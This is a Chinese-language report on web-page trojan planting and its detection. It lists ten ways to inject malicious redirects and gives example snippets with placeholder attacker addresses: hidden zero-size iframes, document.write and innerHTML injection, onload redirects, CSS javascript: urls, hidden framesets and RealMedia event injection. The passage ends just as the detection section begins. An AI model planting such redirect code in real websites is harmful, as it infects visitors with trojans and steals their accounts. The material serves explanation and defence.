挂马与检测技术报告什么是挂马?所谓的挂马,就是黑客通过各种手段,包括SQL注入,敏感文件扫描,服务器漏洞,程序0day, 等各种方法获得管理员账号,然后登陆后台,通过数据库备份/恢复或者上传漏洞获得一个webshell。
利用获得的webshell修改页面的容,向页面中加入恶意转向代码。
也可以直接通过弱口令获得服务器或者FTP,然后直接对页面直接进行修改。
当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。
挂马的危害危害和应用的普及程度有关,上网人人都会,也就是说,人人都可能中毒。
据金山毒霸安全实验室统计,每天有数百万次浏览与挂马网页有关,中毒概率在20%-50%之间。
很多游戏被挂马,黑客目的就是盗取浏览该玩家的游戏账号,而那些大型被挂马,则是为了搜集大量的肉鸡。
被挂马不仅会让自己的失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱,沦为黑客的肉鸡。
如果不小心进入了已被挂马的,则会感染木马病毒,以致丢失大量的宝贵文件资料和账号密码,其危害极大。
挂马泛滥的原因利。
病毒木马黑色产业链有丰厚的利润,去年警方抓获的大小姐系列木马案,犯罪集团3个月获得非常收益3000万。
网络应用越普及,黑色产业链的从业者收益也就越高。
挂马围哪些容易被挂马呢?越是流量高的对黑客越有吸引力,黑客攻破一个管理上有漏洞并且流量很高的,一天就可以感染数百万人。
那些与公共事业密切相关的,比如政府机关的,,视频,聊天交友,提供盗版软件破解工具的最容易被入侵,几乎每周出现的热点网络事件都被攻击者利用,网民一不小心就会受热门事件吸引中招。
挂马的常见方式1.框架挂马<iframe src=地址 width=0 height=0></iframe>其中“地址”处可以输入恶意等。
属性为0意味着该框架是不可见的,受害者若不查看源代码很难发现网页木马。
这个方法也是挂马最常用的一段代码,但是随着管理员和广大网民安全意识的提高,只要在源代码中搜索iframe这个关键字,就很容易找到网页木马的源头。
2.js文件挂马只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS 代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。
相比iframe这个标签,<SCRIPT src="xx.js" type=text/javascript>这段代码就显得更加隐蔽,因为几乎95%的网页中都会出现类似的script 标签。
利用js引入网页木马也有多种方法:在js中直接写出框架网页木马示例代码如下:document.write("<iframe width='0' height='0' src='网页木马地址'></iframe>");指定language的属性为"JScript.Encode"还可以引入其他扩展名的js代码,这样就更加具有迷惑性,示例代码如下:<SCRIPT language="JScript.Encode" src=. xxx./mm.jpg></script>;利用js更改body的innerHTML属性,引入网页木马如果对容进行编码的话,不但能绕过杀毒软件的检测,而且增加了解密的难度,示例代码如下:op.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe src="网页木马地址/%22%3E%3C/iframe%3E';利用JavaScript的window.open方法打开一个不可见的新窗口示例代码如下:<SCRIPT language=javascript>window.open("网页木马地址","","toolbar=no, location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1" );</script>;利用URL欺骗示例代码如下:a href=".163.(/迷惑用户的地址,显示这个地址指向木马地址)" onMouseOver="_163_(); return true;"> 页面要显示的正常容</a>:<SCRIPT Language="JavaScript">function _163_ (){var url="网页木马地址";open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=n o,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10" );}</SCRIPT>3.body挂马使用如下代码,就可以使网页在加载完成的时候跳转到网页木马的网址<body onload="window.location='网页木马地址';"></body>。
4.css中挂马利用层叠样式表CSS引入js,从而引入网页木马,示例代码如下:body{background-image:url('javascript:document.write("<scriptsrc=/muma.js></script>")')}这种方式比较难发现。
5.图片伪装随着防毒技术的发展,黑客手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似: .xxx./test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了,如图3。
图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:<html><iframe src=".xxx./test.htm" height=0 width=0> </iframe><img src=".xxx./test.jpg"></center></html>注:当用户打开www.xxx./test.htm是,显示给用户的是www.xxx./test.jpg,而www.xxx./test.htm网页代码也随之运行。
6.利用隐藏的分割框架引入网页木马示例代码如下:<frameset rows="444,0" cols="*"><frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"><frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"></frameset>7.在swf中挂马网上有一些swf挂马的工具,可以用工具替换原来网页中的swf或单独把swf发给对方,一可以单独作一个可显示swf页的网页。
在网页中插入swf的语法一般格式为:<OBJECTclassid=clsid:D27CDB6E-AE6D-11cf-96B8-0codebase=download.macromedia./pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high><EMBEDsrc=/xxx.swf”quality=highpluginspage=.macromedia./shockwave/download/index.cgi?P1_Prod_Version=Shockwave Flashtype=application/x-shockwave-flash width=760 height=60></EMBED></OBJECT>8.在影音文件中挂马所需工具是RealMedia Editor,打开工具后,然后依次选择“文件”-“打开Real媒体文件”,然后选择需要编辑的视频文件,其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。
接着,新建一个文本,在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal& .xxx./horse.htm ;(00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。
)输入完毕后并保存,然后依次选择“工具”-“合并事件”,导入刚才的文本。
当合并完成后,依次选择“文本”-“Real文件另存为”,保存好即可。
最后把生成的视频文件发布网上,当对方观看同时就会连接到你指定的木马地址。
9.通过钓鱼挂马黑客伪造,并在钓鱼上插入恶意代码下载木马。
10.ARP挂马并不需要真正攻陷目标:知名通常防护严密。
ARP欺骗:对同一以太网网段中,通过ARP欺骗方法进行中间人攻击,可劫持指定网络流量并进行任意修改ARP欺骗挂马:在Web请求反馈页面中插入iframe等重定向代码,从而使得目标被“虚拟”挂马挂马的检测方式1.特征匹配文本文件型病毒的特征码是从它的代码中提取一处或多处此病毒特有的字符串作为病毒文件的特征,只要这些字符串稍有变化,病毒的特征也就变化了,则必须增加病毒的特征记录。
